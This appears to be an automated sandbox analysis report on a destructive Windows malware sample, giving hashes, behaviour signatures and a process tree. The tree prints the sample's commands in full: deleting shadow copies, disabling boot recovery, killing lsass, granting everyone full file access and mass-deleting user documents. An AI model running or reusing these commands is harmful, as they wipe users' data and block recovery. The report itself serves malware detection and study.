Analysis

  • max time kernel
    59s
  • max time network
    56s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    12-07-2020 04:08

Errors

Reason
Machine shutdown

General

  • Target

    winosntkrnl.exe

  • Size

    2.1MB

  • MD5

    23959126c21fdda02365352cd3e03d28

  • SHA1

    05a025b6ad3f4b88084624234312767e9402202a

  • SHA256

    2a0ce8239387c614b1728bd9ec954e1e9ab985dde87e5976519ee1cfca1ee896

  • SHA512

    ad5326da158a3701aeb827084a425ab7e2633ca59837241da449b03d4be7b8f77c336748dc1cf0f7d4fd4928f6258c83c7fbda9a5b28686f36e0666f07c42084

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Suspicious use of WriteProcessMemory 152 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 128 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Modifies file permissions 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Checks whether UAC is enabled 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\winosntkrnl.exe
    "C:\Users\Admin\AppData\Local\Temp\winosntkrnl.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of FindShellTrayWindow
    PID:240
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo off
      2⤵
        PID:1860
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls . /grant Everyone:F /T /C /Q
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\SysWOW64\icacls.exe
          icacls . /grant Everyone:F /T /C /Q
          3⤵
          • Modifies file permissions
          PID:1768
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1752
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im explorer.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1776
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im regedit.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im regedit.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:360
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im lsass.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:804
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im lsass.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1624
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c shutdown /r /t 150 /c "trolololololololol"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\SysWOW64\shutdown.exe
          shutdown /r /t 150 /c "trolololololololol"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c RD /s /q %systemdrive%\$Recycle.bin
        2⤵
          PID:1988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c RD /s /q %UserProfile%Documents
          2⤵
            PID:1964
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c MD %UserProfile%Documents
            2⤵
              PID:1944
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c RD /s /q C:WindowsMinidump
              2⤵
                PID:1984
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet
                2⤵
                  PID:1008
                  • C:\Windows\SysWOW64\vssadmin.exe
                    vssadmin delete shadows /all /quiet
                    3⤵
                    • Interacts with shadow copies
                    PID:2016
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c wmic shadowcopy delete
                  2⤵
                    PID:1996
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic shadowcopy delete
                      3⤵
                        PID:2000
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                      2⤵
                        PID:2044
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c cd %UserProfile%
                        2⤵
                          PID:1468
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c DEL /s /q /f *.DOC *.DOCX *.xls *.xlsx *.png *.txt *.pdf *.jpeg *.png *.bmp *.rtf *.ppt *.pptx *.odf *.tif *.jpg *.svg *.htm *.html
                          2⤵
                            PID:1504
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/watch?v=oHg5SJYRHA0
                            2⤵
                            • Suspicious use of SetWindowsHookEx
                            • Modifies Internet Explorer settings
                            • Checks whether UAC is enabled
                            PID:996
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:996 CREDAT:275457 /prefetch:2
                              3⤵
                              • Checks whether UAC is enabled
                              PID:1532
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
                            2⤵
                            • Suspicious use of SetWindowsHookEx
                            • Modifies Internet Explorer settings
                            • Checks whether UAC is enabled
                            PID:1804
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1804 CREDAT:275457 /prefetch:2
                              3⤵
                                PID:1836
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
                              2⤵
                              • Suspicious use of SetWindowsHookEx
                              • Modifies Internet Explorer settings
                              • Checks whether UAC is enabled
                              PID:1876
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1876 CREDAT:275457 /prefetch:2
                                3⤵
                                • Checks whether UAC is enabled
                                PID:1664
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
                              2⤵
                              • Suspicious use of SetWindowsHookEx
                              • Modifies Internet Explorer settings
                              • Checks whether UAC is enabled
                              PID:1744
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1744 CREDAT:275457 /prefetch:2
                                3⤵
                                  PID:1428
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
                                2⤵
                                • Suspicious use of SetWindowsHookEx
                                • Modifies Internet Explorer settings
                                • Checks whether UAC is enabled
                                PID:1668
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1668 CREDAT:275457 /prefetch:2
                                  3⤵
                                  • Checks whether UAC is enabled
                                  PID:1756
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
                                2⤵
                                • Suspicious use of SetWindowsHookEx
                                • Modifies Internet Explorer settings
                                • Checks whether UAC is enabled
                                PID:360
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:360 CREDAT:275457 /prefetch:2
                                  3⤵
                                    PID:500
                                • C:\Program Files\Internet Explorer\iexplore.exe
                                  "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
                                  2⤵
                                  • Suspicious use of SetWindowsHookEx
                                  • Modifies Internet Explorer settings
                                  • Checks whether UAC is enabled
                                  PID:1920
                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1920 CREDAT:275457 /prefetch:2
                                    3⤵
                                      PID:1608
                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
                                    2⤵
                                    • Suspicious use of SetWindowsHookEx
                                    • Modifies Internet Explorer settings
                                    • Checks whether UAC is enabled
                                    PID:1972
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1972 CREDAT:275457 /prefetch:2
                                      3⤵
                                        PID:2016
                                  • C:\Windows\system32\wlrmdr.exe
                                    -s -1 -f 2 -t You are about to be logged off -m Windows has encountered a critical problem and will restart automatically in one minute. Please save your work now. -a 3
                                    1⤵
                                      PID:1500

                                    Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads